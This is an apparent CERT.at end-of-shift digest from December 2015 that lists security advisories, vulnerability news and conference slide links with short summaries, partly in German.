End-of-Shift report
Timeframe: Dienstag 01-12-2015 18:00 − Mittwoch 02-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
Cisco Unified Computing System Central Software Cross-Site Scripting Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151201-ucs
DSA-3408 gnutls26 - security update
It was discovered that GnuTLS, a library implementing the TLS and SSLprotocols, incorrectly validates the first byte of padding in CBC modes.A remote attacker can possibly take advantage of this flaw to perform apadding oracle attack.
https://www.debian.org/security/2015/dsa-3408
VU#630239: Epiphany Cardio Server version 3.3 is vulnerable to SQL and LDAP injection
The Epiphany Cardio Server prior to version 4.0 is vulnerable to SQL injection and LDAP injection, allowing an unauthenticated attacker to gain administrator rights.
http://www.kb.cert.org/vuls/id/630239
Cisco UCS Central Software Server-Side Request Forgery Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151201-ucs1
Saia Burgess Controls PCD Controller Hard-coded Password Vulnerability
This advisory provides mitigation details for a hard-coded password vulnerability in Saia Burgess Controls's family of PCD controllers.
https://ics-cert.us-cert.gov/advisories/ICSA-15-335-01
Schneider Electric ProClima ActiveX Control Vulnerabilities
This advisory provides mitigation details for remote code execution vulnerabilities in the Schneider Electric ProClima F1 Bookview ActiveX control application.
https://ics-cert.us-cert.gov/advisories/ICSA-15-335-02
Siemens SIMATIC Communication Processor Vulnerability
This advisory provides mitigation details for an authentication bypass vulnerability in the Siemens SIMATIC Communication Processor devices.
https://ics-cert.us-cert.gov/advisories/ICSA-15-335-03
DSA-3409 putty - security update
A memory-corrupting integer overflow in the handling of the ECH (erasecharacters) control sequence was discovered in PuTTYs terminalemulator. A remote attacker can take advantage of this flaw to mount adenial of service or potentially to execute arbitrary code.
https://www.debian.org/security/2015/dsa-3409
Security Advisory - Privilege Escalation Vulnerability in Huawei LogCenter
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-464243.htm
Security Advisory - DoS Vulnerability in Huawei LogCenter
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-464247.htm
Entropy drought hits Raspberry Pi harvests, weakens SSH security
Hotfix posted online to shore up Raspbian key generation Raspberry Pis running Raspbian - a flavor of Debian GNU/Linux tuned for the credit-card-sized computers - apparently generate weak SSH host keys.
www.theregister.co.uk/2015/12/02/raspberry_pi_weak_ssh_keys/
DSA-3410 icedove - security update
Multiple security issues have been found in Icedove, Debians version ofthe Mozilla Thunderbird mail client: Multiple memory safety errors,integer overflows, buffer overflows and other implementation errors maylead to the execution of arbitrary code or denial of service.
https://www.debian.org/security/2015/dsa-3410
Chrome für Linux: Google streicht 32-Bit-Version
Support endet März 2016 – Community kann weiterhin eigene Builds bauen
http://derstandard.at/2000026808558
BSides Vienna 2015 Slides
The slides of the BSides Vienna are available online and linked directly at the schedule page:
https://bsidesvienna.at/talks/ You can also wget them: wget
http://bsidesvienna.at/slides/2015/a_case_study_on_the_security_of_application_whitelisting.pdf wget
http://bsidesvienna.at/slides/2015/closing_slides.pdf wget
http://bsidesvienna.at/slides/2015/crypto_wars_2.0.pdf wget
http://bsidesvienna.at/slides/2015/digital_supply_chain_security.pdf wget
http://www.reddit.com/r/netsec/comments/3v50y7/bsides_vienna_2015_slides/
Security: Bug Bounty für Barbie-Puppen
Nicht nur Vtech-Spielzeug ist unsicher: Die umstrittene WLAN-Barbie von Mattel hält es mit der Sicherheit ebenfalls nicht so genau. Ein Hacker konnte aus der Puppe zahlreiche Informationen auslesen - und glaubt, auch die Serveranbindung manipulieren zu können.
http://www.golem.de/news/security-bug-bounty-fuer-barbie-puppen-1512-117769.html
Nessus and Powershell is like Chocolate and Peanut Butter!, (Wed, Dec 2nd)
In a typical security assessment, youll do authenticated scans of internal hosts, looking for vulnerabilities due to missed patches or configuration issues. I often use Nessus for this, but find that for a typical IT manager, the Nessus ..
https://isc.sans.edu/diary.html?storyid=20431
Ponmocup
Ponmocup2. Dezember 2015Aktuell ist das Botnet, zu dem wir die meisten Infektionen gemeldet bekommen, immer noch Conficker. Weit abgeschlagen dahinter finden sich "gozi", "nymaim", "ZeuS" (incl. Varianten), "tinba" und "dyre". Die genauen Zahlen variieren stark, da ist die Konsistenz der Messungen nicht die beste.Jetzt haben wir einen neuen Namen hoch oben in der Liste: "Ponmocup". Die Malware selber ist nicht neu, manche setzten die
http://www.cert.at/services/blog/20151202163506-1641.html
The Perils of Vendor Bloatware
In todays Stormcast, Johannes summarizes the current issue with some of the software that comes pre-installed on Dell Laptops. In short, Dell Foundation Services, which is used for remote management, allows unauthenticated WMI queries to be processed, ..
https://isc.sans.edu/diary.html?storyid=20433
IBM Security Bulletin: A potential security vulnerability in WebSphere Liberty Profile affects InfoSphere Streams (CVE-2015-1927)
http://www.ibm.com/support/docview.wss?uid=swg21967767
IBM Security Bulletin: IBM Cognos Business Intelligence Server 2015Q4 Security Updater : IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities.
http://www.ibm.com/support/docview.wss?uid=swg21959874
IBM Security Bulletin: Multiple vulnerabilities in Apache HttpComponents affect IBM Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)
http://www.ibm.com/support/docview.wss?uid=swg21970193
Dell verschlimmbessert die Foundation-Services-Lücke
Angreifer aus dem Web können bei bestimmten Dell-Rechnern den Service-Tag auslesen und die Nutzer so tracken. Dell hat diese Lücke nun geschlossen. Seit dem Update kann man allerdings unter anderem die gesamte Hardware-Konfiguration auslesen.
http://www.heise.de/security/meldung/Dell-verschlimmbessert-die-Foundation-Services-Luecke-3029552.html